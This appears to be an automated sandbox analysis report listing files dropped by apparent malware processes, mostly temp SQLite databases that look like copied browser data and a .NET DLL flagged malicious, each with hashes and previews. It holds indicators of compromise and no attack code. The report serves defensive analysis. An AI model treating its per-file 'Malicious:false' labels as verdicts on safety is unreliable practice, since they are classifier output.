                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\uZbvpB6qfg

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\vHYA0dZ3Kt

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\vKu3YhdsDM

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\vtN3fYnyIU

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\w18CGvTrWY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wHak2K4ZAS

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wM6C8AMmN1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wY9FqCzBtK

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\whtxfpajCL

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wrCb7HnTyy

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wrDtSwmceZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wvn9nzYgBZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\x9Yk7T7h8d

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\xiElS7OmO8

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\xpBW9BHgrf

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\xrDK0fD1iu

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.403856189774723
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:aGQRWct9TRia:aGQRZ1L
                                                                                          MD5:5FC2C990D1AB70BD7E657952E59DEDB3
                                                                                          SHA1:43319611F98B7B030B1D69F5F2377FFBFB09783C
                                                                                          SHA-256:6EF1D069DA0E35D6DDF94939E06A52B1380C4D6B96A7C031F2552C3D21CC7127
                                                                                          SHA-512:EC718509289DCF6E3D5EB14EC2695BDDFF7ECB15865E86D37D1030E8AA8D926FACD5958DA3D046D0A54066EA3CD8382C099417453BFFB94B905ECAE7F276B044
                                                                                          Malicious:false
                                                                                          Preview:s8cSR6x3rix3o7WXvwG8EhBVa

                                                                                          C:\Users\user\AppData\Local\Temp\yASK219nSX

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\yNZAle35F6

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ynPYWbyriW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\yqnzCXwB1W

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\z5p3XnKjm5

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\zfMmVDtVjZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\BnGVmWDc.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):41472
                                                                                          Entropy (8bit):5.6808219961645605
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
